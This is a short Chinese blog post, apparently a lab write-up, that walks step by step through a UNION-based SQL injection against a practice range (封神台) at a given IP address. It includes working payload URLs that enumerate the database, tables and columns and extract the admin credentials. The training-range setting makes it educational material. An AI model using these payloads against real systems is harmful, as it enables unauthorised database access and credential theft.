一次简单的通过sql注入获取目标用户名和密码的流程

    科技2022-07-20  97

    靶场环境:封神台

    第一步

    http://59.63.200.79:8003/?id=2-1 验证注入点存在

    第二步

    http://59.63.200.79:8003/?id=1 order by 1/2/… 查询到长度为2

    第三步

    http://59.63.200.79:8003/?id=9.99 union select 1,2 验证数据返回点,返回值为2

    第四步

    http://59.63.200.79:8003/?id=9.99 union select 1,database() 查询到库名为maoshe

    第五步

    http://59.63.200.79:8003/?id=9.99 union select 1,table_name from information_schema.tables where table_schema=database() 查询到maoshe库下的表名 admin dirs news xss

    第六步

    http://59.63.200.79:8003/?id=9.99 union select 1,column_name from information_schema.columns where table_name=‘admin’ and table_schema=database() 查询到admin表下字段名 #group_concat(column_name) id username password

    第七步

    http://59.63.200.79:8003/?id=9.99 union select 1,password from admin 查询到admin下用户名和密码分别为 admin hellohack

    Processed: 0.011, SQL: 8